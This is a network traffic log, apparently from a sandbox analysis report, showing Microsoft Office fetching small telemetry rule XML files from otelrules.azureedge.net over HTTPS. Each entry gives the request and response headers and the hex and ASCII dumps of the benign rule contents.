                                                                                                                                            2024-10-31 16:13:10 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            68192.168.2.44982513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:10 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:10 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 472
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                            x-ms-request-id: a9b9ee84-f01e-001f-7a95-2a5dc8000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161310Z-159b85dff8f9g9g4hC1DFW9n7000000001v0000000005uey
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:10 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            69192.168.2.44982613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:11 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:11 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:11 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 468
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                            x-ms-request-id: 9016a745-201e-0096-70e6-25ace6000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161311Z-16849878b786fl7gm2qg4r5y700000000a1g00000000cz5u
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:11 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            70192.168.2.44982813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:11 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:11 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 411
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                            x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161311Z-16849878b78p8hrf1se7fucxk80000000amg00000000hbpm
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:11 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            71192.168.2.44983013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:11 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:11 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:11 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 427
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                            x-ms-request-id: a342e9ea-d01e-0066-419c-27ea17000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161311Z-16849878b78qg9mlz11wgn0wcc000000098g00000000rthg
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:11 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            72192.168.2.44982913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:11 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:11 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:11 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 470
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                            x-ms-request-id: 6cbbe1db-401e-0083-6516-26075c000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161311Z-16849878b78smng4k6nq15r6s40000000b8g00000000g729
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:11 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            73192.168.2.44982713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:11 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:11 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 485
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                            x-ms-request-id: 98e85290-a01e-0021-7dec-2a814c000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161311Z-16849878b78j5kdg3dndgqw0vg0000000bc000000000uvx3
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:11 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            74192.168.2.44983113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:11 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:12 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 502
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                            x-ms-request-id: 4e972348-801e-00ac-276d-28fd65000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161312Z-15b8d89586f989rkwt13xern54000000050000000000ezdm
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:12 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            75192.168.2.44983213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:11 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:12 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:12 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 407
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                            x-ms-request-id: 9cbc4178-801e-008f-12a3-262c5d000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161312Z-16849878b786fl7gm2qg4r5y7000000009x000000000xz4e
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:12 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            76192.168.2.44983313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:12 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:12 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 474
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                            x-ms-request-id: 5ef35a72-501e-007b-6836-285ba2000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161312Z-15b8d89586f6nn8zqg1h5suba800000004yg00000000e5k9
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:12 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            77192.168.2.44983413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:12 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:12 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:12 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 408
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                                            x-ms-request-id: 4bda8ee7-201e-0003-1763-27f85a000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161312Z-16849878b78qfbkc5yywmsbg0c00000009fg0000000070ta
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
